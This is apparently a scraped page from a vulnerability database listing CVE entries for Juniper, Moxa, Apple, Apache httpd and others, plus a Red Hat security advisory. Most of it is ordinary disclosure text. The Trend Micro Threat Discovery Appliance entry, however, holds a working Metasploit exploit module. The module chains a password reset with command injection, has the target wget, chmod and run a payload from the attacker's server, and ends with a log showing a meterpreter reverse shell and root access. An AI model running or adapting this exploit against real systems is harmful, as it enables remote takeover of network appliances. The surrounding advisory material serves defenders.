VARIoT IoT vulnerabilities database


VAR-201704-0005 CVE-2010-1816 Apple Mac OS X and Mac OS X Server: buffer overflow in ImageIO CVSS V2: 9.3
CVSS V3: 7.8
Severity: HIGH
Buffer overflow in ImageIO in Apple Mac OS X 10.6 through 10.6.3 and Mac OS X Server 10.6 through 10.6.3 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a crafted image. Apple Mac OS X and Apple Mac OS X Server are both Apple products; Mac OS X is the operating system developed for Mac computers. ImageIO is the component used to perform common image I/O operations.
VAR-201704-0006 CVE-2010-1821 Apple Mac OS X and Mac OS X Server: local privilege escalation to system privileges CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
Apple Mac OS X 10.6 through 10.6.3 and Mac OS X Server 10.6 through 10.6.3 allow local users to obtain system privileges. The flaw lies in the Kernel component; a local attacker could exploit it to gain system privileges.
VAR-201706-0901 CVE-2017-9358 Asterisk Open Source and Certified Asterisk Vulnerable to resource exhaustion CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A memory exhaustion vulnerability exists in Asterisk Open Source 13.x before 13.15.1 and 14.x before 14.4.1 and Certified Asterisk 13.13 before 13.13-cert4, which can be triggered by sending specially crafted SCCP packets causing an infinite loop and leading to memory exhaustion (by message logging in that loop). Asterisk Open Source and Certified Asterisk therefore contain a resource exhaustion vulnerability that may put the service into a denial-of-service (DoS) state. Multiple Asterisk products are prone to this remote denial-of-service vulnerability; an attacker can exploit the issue to cause a denial-of-service condition.
VAR-201704-0016 CVE-2015-7562 TeamPass Vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Multiple cross-site scripting (XSS) vulnerabilities in TeamPass 2.1.24 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) label value of an item or (2) name of a role. TeamPass is a password manager built on Apache, MySQL and PHP. A cross-site scripting vulnerability exists in TeamPass 2.1.24 and earlier.
VAR-201704-0749 CVE-2017-2329 Juniper Networks NorthStar Controller Application: insufficient authentication vulnerability CVSS V2: 2.1
CVSS V3: 6.2
Severity: MEDIUM
An insufficient authentication vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an unprivileged, authenticated user to execute certain specific unprivileged system files capable of causing widespread denials of system services. Juniper Networks NorthStar Controller Application is a traffic planning controller from Juniper Networks; it optimizes a service provider's transport network using open industry-standard protocols. Versions prior to Juniper Networks NorthStar Controller Application 2.1.0 Service Pack 1 are vulnerable, and an attacker could exploit the vulnerability to cause a denial of service.
VAR-201704-0746 CVE-2017-2326 Juniper Networks NorthStar Controller Application: information disclosure vulnerability CVSS V2: 6.8
CVSS V3: 6.5
Severity: MEDIUM
An information disclosure vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an unprivileged, authenticated, network-based attacker to replicate the underlying Junos OS VM and all data it maintains to their local system for future analysis. Juniper NorthStar Controller Application is prone to a local security-bypass vulnerability; an attacker may exploit this issue to bypass certain security restrictions and perform unauthorized actions. Juniper NorthStar Controller Application before version 2.1.0 Service Pack 1 is vulnerable. The controller optimizes a service provider's transport network by establishing open industry-standard protocols. An attacker could exploit this vulnerability to copy the underlying Junos OS VM and its data to their own local system.
VAR-201704-0740 CVE-2017-2320 Juniper Networks NorthStar Controller Application: authorization, permissions and access control vulnerability CVSS V2: 10.0
CVSS V3: 10.0
Severity: CRITICAL
A vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an unauthenticated, unprivileged, network-based attacker to cause various denials of services leading to targeted information disclosure, modification of any component of the NorthStar system, including managed systems, and full denial of services to any systems under management which NorthStar interacts with using read-only or read-write credentials. Juniper Networks NorthStar Controller Application has vulnerabilities related to authorization, permissions, and access control; a network-based attacker may obtain or tamper with information or cause a denial of service (DoS). Juniper Networks NorthStar Controller Application is a traffic planning controller from Juniper Networks; it optimizes a service provider's transport network using open industry-standard protocols. Permissions and access control vulnerabilities exist in versions prior to Juniper Networks NorthStar Controller Application 2.1.0 Service Pack 1; an attacker could exploit them to cause a denial of service and to change components of the NorthStar system.
VAR-201704-0742 CVE-2017-2322 Juniper Networks NorthStar Controller Application: denial of service (DoS) against system services CVSS V2: 2.1
CVSS V3: 5.5
Severity: MEDIUM
A denial of service vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an authenticated user to cause widespread denials of service to system services by consuming TCP and UDP ports which are normally reserved for other system services. Juniper NorthStar Controller Application is prone to a local denial-of-service vulnerability; an attacker can exploit this issue to cause a denial-of-service condition. The controller optimizes a service provider's transport network by establishing open industry-standard protocols.
VAR-201704-0747 CVE-2017-2327 Juniper Networks NorthStar Controller Application: resource management vulnerability CVSS V2: 4.9
CVSS V3: 5.5
Severity: MEDIUM
A denial of service vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an authenticated malicious user to consume large amounts of system resources leading to a cascading denial of services. Juniper NorthStar Controller Application is prone to a local denial-of-service vulnerability; an attacker can exploit this issue to crash the affected application, resulting in a denial-of-service condition. The controller optimizes a service provider's transport network by establishing open industry-standard protocols.
VAR-201704-0342 CVE-2016-7547 Trend Micro Threat Discovery Appliance: time-and-state vulnerability (command execution via admin_sys_time.cgi) CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
A command execution flaw on the Trend Micro Threat Discovery Appliance 2.6.1062r1 exists with the timezone parameter in the admin_sys_time.cgi interface. Trend Micro Threat Discovery Appliance is a next-generation network monitoring device. Its admin_sys_time.cgi interface does not safely handle the timezone parameter, so a remote attacker can submit a specially crafted request to execute arbitrary commands. The Metasploit module whose source follows chains two flaws. The first is an authentication bypass via a file delete in logoff.cgi which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552); the second is the command injection described above (CVE-2016-7547). Note: you have the option to use the authentication bypass or not, since it requires that the server is rebooted. The password reset renders the authentication useless; typically, if an administrator can't log in, they will bounce the box. Therefore, this module performs a heartbeat request until the box is bounced and then attempts to log in and to perform the command injection. This module has been tested on version 2.6.1062r1 of the appliance.
      },
      'Author'         =>
        [
          'mr_me <steventhomasseeley@gmail.com>',    # vuln + msf
          'Roberto Suggi Liverani @malerisch',        # vuln + msf
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'https://asciinema.org/a/112480'], # demo
          [ 'CVE', '2016-7552'],                      # auth bypass
          [ 'CVE', '2016-7547'],                      # cmdi
        ],
      'Platform'       => 'linux',
      'Arch'           => ARCH_X86,
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]
        ],
      'DefaultOptions' => { 'SSL' => true },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 10 2017'))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'The target URI', '/']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']),
        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
        OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),
      ], self.class)
  end

  def check
    if do_login
      res = send_request_cgi({
        'uri'    => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'),
        'cookie' => @cookie,
        'method' => 'GET',
      }, 1)
      if res and res.code == 200 and res.body =~ /About Trend Micro/
        version = "#{$1}" if res.body =~ /var ver_str = new String\("(.*)"\)/
        case version
        when /2.6.1062/
          return Exploit::CheckCode::Vulnerable
        end
      end
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    if datastore['AUTHBYPASS']
      print_status("Bypassing authentication...")
      if reset_password
        print_good("The password has been reset!")
        print_status("Waiting for the administrator to reboot...")
        pwn_after_reboot
      end
    else
      if do_login
        pwn
      else
        fail_with(Failure::NoAccess, "Authentication failed")
      end
    end
  end

  def reset_password
    c = "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'),
      'method' => 'GET',
      'cookie' => c,
    })
    if res and res.code == 200 and res.headers.to_s =~ /Backtrace/
      return true
    end
    return false
  end

  def pwn
    start_http_server
    print_good("Logged in")
    download_exec
  end

  def pwn_after_reboot
    @rebooted = false
    while !@rebooted
      if do_login
        @rebooted = true
        pwn
      end
    end
  end

  def on_request_uri(cli, request)
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end

  def start_http_server
    @pl = generate_payload_exe
    @elf_sent = false
    downfile = rand_text_alpha(8+rand(8))
    resource_uri = '/' + downfile

    # do not use SSL for the attacking web server
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end

    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
    else
      srv_host = datastore['SRVHOST']
    end

    @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
    service_url_payload = srv_host + resource_uri

    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
    start_service({'Uri' => {
      'Proc' => Proc.new { |cli, req|
        on_request_uri(cli, req)
      },
      'Path' => resource_uri
    }})

    datastore['SSL'] = true if ssl_restore
    connect
  end

  def exec(cmd)
    send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'),
      'cookie'    => @cookie,
      'method'    => 'POST',
      'vars_post' => {
        'act'      => 'save',
        'timezone' => cmd,
      }
    }, 1)
  end

  def download_exec
    @bd = rand_text_alpha(8+rand(8))
    register_file_for_cleanup("/tmp/#{@bd}")
    exec("|`wget #{@service_url} -O /tmp/#{@bd}`")
    exec("|`chmod 755 /tmp/#{@bd}`")
    exec("|`/tmp/#{@bd}`")
    # we need to delay, for the stager
    select(nil, nil, nil, 5)
  end

  def do_login
    begin
      login = send_request_cgi({
        'uri'       => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),
        'method'    => 'POST',
        'vars_post' => {
          'passwd'         => datastore['PASSWORD'],
          'isCookieEnable' => 1,
        }
      })
    # these are needed due to the reboot
    rescue Rex::ConnectionRefused
      return false
    rescue Rex::ConnectionTimeout
      return false
    end
    if login and login.code == 200 and login.body =~ /frame\.cgi/
      @cookie = "session_id=#{$1};" if login.get_cookies =~ /session_id=(.*);/
      return true
    end
    return false
  end
end

=begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc
[*] Processing scripts/trend.rc for ERB directives.
resource (scripts/trend.rc)> use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi
resource (scripts/trend.rc)> set RHOST 192.168.100.2
RHOST => 192.168.100.2
resource (scripts/trend.rc)> set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
resource (scripts/trend.rc)> set LHOST 192.168.100.13
LHOST => 192.168.100.13
resource (scripts/trend.rc)> exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.100.13:4444
[*] Bypassing authentication...
msf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > [+] The password has been reset!
[*] Waiting for the reboot...
[*] 192.168.100.2:443 - Starting up our web service on http://192.168.100.13:1337/nnDBuOUMuKnxP ...
[*] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP
[*] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP
[+] Logged in
[*] 192.168.100.2:443 - Sending the payload to the server...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.100.2
[*] Meterpreter session 1 opened (192.168.100.13:4444 -> 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500
[+] Deleted /tmp/rpNDXQZTB
[*] Server stopped.
msf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3846 created.
Channel 1 created.

BusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

/bin/sh: can't access tty; job control turned off
/opt/TrendMicro/MinorityReport/www/cgi-bin # id
id
uid=0(root) gid=0(root)
/opt/TrendMicro/MinorityReport/www/cgi-bin #
=end
VAR-201704-0736 CVE-2017-2316 Juniper Networks NorthStar Controller Application Buffer Overflow Vulnerability CVSS V2: 2.1
CVSS V3: 6.5
Severity: MEDIUM
A buffer overflow vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an authenticated malicious user to cause a buffer overflow leading to a denial of service. Juniper Networks NorthStar Controller Application is a traffic planning controller from Juniper Networks; it optimizes a service provider's transport network using open industry-standard protocols. Juniper NorthStar Controller Application is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to crash the affected application, resulting in a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.
VAR-201704-0745 CVE-2017-2325 Juniper Networks NorthStar Controller Application buffer overflow vulnerability CVSS V2: 4.0
CVSS V3: 6.5
Severity: MEDIUM
A buffer overflow vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an authenticated malicious user to cause a buffer overflow leading to a denial of service. Juniper Networks NorthStar Controller Application is a traffic planning controller from Juniper Networks; it optimizes a service provider's transport network using open industry-standard protocols. An attacker could exploit the vulnerability to cause a denial of service; successful exploits may also allow an attacker to execute arbitrary code.
VAR-201704-0744 CVE-2017-2324 Juniper Networks NorthStar Controller Application Command Injection Vulnerability CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
A command injection vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow a network-based malicious attacker to cause a denial of service condition. Juniper Networks NorthStar Controller Application is a traffic planning controller from Juniper Networks; it optimizes a service provider's transport network using open industry-standard protocols. The command injection vulnerability exists in versions prior to Juniper Networks NorthStar Controller Application 2.1.0 Service Pack 1.
VAR-201704-0743 CVE-2017-2323 Juniper Networks NorthStar Controller Application: denial of service (DoS) vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A denial of service vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow a malicious attacker crafting packets destined to the device to cause a persistent denial of service to the path computation server service, leaving that service in a denial-of-service (DoS) state. Juniper Networks NorthStar Controller Application is a traffic planning controller from Juniper Networks; it optimizes a service provider's transport network using open industry-standard protocols.
VAR-201705-3166 CVE-2017-3134 Fortinet FortiWLC-SD: privilege escalation vulnerability CVSS V2: 9.0
CVSS V3: 7.2
Severity: HIGH
An escalation of privilege vulnerability in Fortinet FortiWLC-SD versions 8.2.4 and below allows an attacker to gain root access via the CLI command 'copy running-config'. Fortinet FortiWLC-SD is a wireless LAN controller from Fortinet. It is prone to a privilege-escalation vulnerability; Fortinet FortiWLC-SD 8.2.4 and prior versions are vulnerable.
VAR-201704-0741 CVE-2017-2321 Juniper Networks NorthStar Controller Application: authorization, permissions and access control vulnerability CVSS V2: 7.5
CVSS V3: 8.6
Severity: HIGH
A vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an unauthenticated, unprivileged, network-based attacker to cause various system services partial to full denials of services, modification of system states and files, and potential disclosure of sensitive information which may assist the attacker in further attacks on the system through the use of multiple attack vectors, including man-in-the-middle attacks, file injections, and malicious execution of commands causing out of bound memory conditions leading to other attacks. Juniper Networks NorthStar Controller Application has vulnerabilities related to authorization, permissions, and access control; a network-based attacker may obtain or tamper with information or cause a denial of service (DoS). Juniper Networks NorthStar Controller Application is a traffic planning controller from Juniper Networks; it optimizes a service provider's transport network using open industry-standard protocols. A remote privilege elevation vulnerability exists in versions prior to Juniper Networks NorthStar Controller Application 2.1.0 Service Pack 1, and an attacker could exploit it to gain elevated privileges.
VAR-201704-0965 CVE-2016-8716 Moxa AWK-3131A Wireless AP: password management vulnerability (cleartext transmission of password) CVSS V2: 3.3
CVSS V3: 7.5
Severity: HIGH
An exploitable Cleartext Transmission of Password vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. The Change Password functionality of the Web Application transmits the password in cleartext. An attacker capable of intercepting this traffic is able to obtain valid credentials. The Moxa AWK-3131A Wireless AP therefore contains a vulnerability related to its password management function; information may be obtained or altered and service operation may be disrupted (DoS). Moxa AWK-3131A Wireless Access Point is a wireless access point from Moxa, and Web Application is one of its web application modules. The vulnerability in the Web Application feature of Moxa AWK-3131A Wireless Access Point firmware 1.1 is caused by the program transmitting passwords in clear text.
VAR-201704-0966 CVE-2016-8718 Moxa AWK-3131A Wireless Access Point Cross-Site Request Forgery Vulnerability CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
An exploitable Cross-Site Request Forgery vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted form can trick a client into making an unintentional request to the web server which will be treated as an authentic request. Moxa AWK-3131A Wireless Access Point is a wireless access point from Moxa. A remote attacker could exploit this vulnerability to perform unauthorized operations.
VAR-201704-0967 CVE-2016-8719 Moxa AWK-3131A Wireless Access Point Cross-Site Scripting Vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
An exploitable reflected Cross-Site Scripting vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. Specially crafted input, in multiple parameters, can cause malicious scripts to be executed by a victim. Moxa AWK-3131A Wireless AP therefore contains a cross-site scripting vulnerability through which information may be obtained or altered. Moxa AWK-3131A Wireless Access Point is a wireless access point from Moxa, and Web Application is one of its web application modules.
VAR-201706-1000 CVE-2017-7679 Apache httpd Buffer error vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime can read one byte past the end of a buffer when sending a malicious Content-Type response header. Apache httpd therefore contains a buffer error vulnerability; information may be obtained or altered and service operation may be disrupted (DoS). Apache HTTP Server is prone to a buffer-overflow vulnerability. An attacker can exploit this issue to cause denial-of-service conditions. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed. The following versions are vulnerable: Apache HTTP Server 2.2.0 to 2.2.32 and Apache HTTP Server 2.4.0 to 2.4.25.

Red Hat Security Advisory
Synopsis: Important: httpd24-httpd security update
Advisory ID: RHSA-2017:2483-01
Product: Red Hat Software Collections
Advisory URL: https://access.redhat.com/errata/RHSA-2017:2483
Issue date: 2017-08-16
CVE Names: CVE-2017-3167 CVE-2017-3169 CVE-2017-7659 CVE-2017-7668 CVE-2017-7679 CVE-2017-9788

1. Summary:
An update for httpd24-httpd is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64

3. Security Fix(es):
* It was discovered that httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause an httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788)
* It was discovered that the use of httpd's ap_get_basic_auth_pw() API function outside of the authentication phase could lead to authentication bypass. A remote attacker could possibly use this flaw to bypass required authentication if the API was used incorrectly by one of the modules used by httpd. (CVE-2017-3167)
* A NULL pointer dereference flaw was found in httpd's mod_ssl module. A remote attacker could use this flaw to cause an httpd child process to crash if another module used by httpd called a certain API function during the processing of an HTTPS request. (CVE-2017-3169)
* A NULL pointer dereference flaw was found in the mod_http2 module of httpd. A remote attacker could use this flaw to cause an httpd child process to crash via a specially crafted HTTP/2 request. (CVE-2017-7659)
* A buffer over-read flaw was found in httpd's ap_find_token() function. A remote attacker could use this flaw to cause an httpd child process to crash via a specially crafted HTTP request. (CVE-2017-7668)
* A buffer over-read flaw was found in httpd's mod_mime module. A user permitted to modify httpd's MIME configuration could use this flaw to cause an httpd child process to crash. (CVE-2017-7679)

4. Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258
After installing the updated packages, the httpd daemon will be restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):
1463194 - CVE-2017-3167 httpd: ap_get_basic_auth_pw() authentication bypass
1463197 - CVE-2017-3169 httpd: mod_ssl NULL pointer dereference
1463199 - CVE-2017-7659 httpd: mod_http2 NULL pointer dereference
1463205 - CVE-2017-7668 httpd: ap_find_token() buffer overread
1463207 - CVE-2017-7679 httpd: mod_mime buffer overread
1470748 - CVE-2017-9788 httpd: Uninitialized memory reflection in mod_auth_digest

6. Package List:
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

7. References:
https://access.redhat.com/security/cve/CVE-2017-3167
https://access.redhat.com/security/cve/CVE-2017-3169
https://access.redhat.com/security/cve/CVE-2017-7659
https://access.redhat.com/security/cve/CVE-2017-7668
https://access.redhat.com/security/cve/CVE-2017-7679
https://access.redhat.com/security/cve/CVE-2017-9788
https://access.redhat.com/security/updates/classification/#important

8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc.

From a related Red Hat advisory:
* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. (CVE-2017-9798) Red Hat would like to thank Hanno Böck for reporting CVE-2017-9798.

This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience. This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 3 serves as an update to Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References. Security Fix(es): * An out-of-bounds array dereference was found in apr_time_exp_get(). An attacker could abuse an unvalidated usage of this function to cause a denial of service or potentially lead to a data leak. JIRA issues fixed (https://issues.jboss.org/): JBCS-402 - Errata for httpd 2.4.23.SP3 RHEL7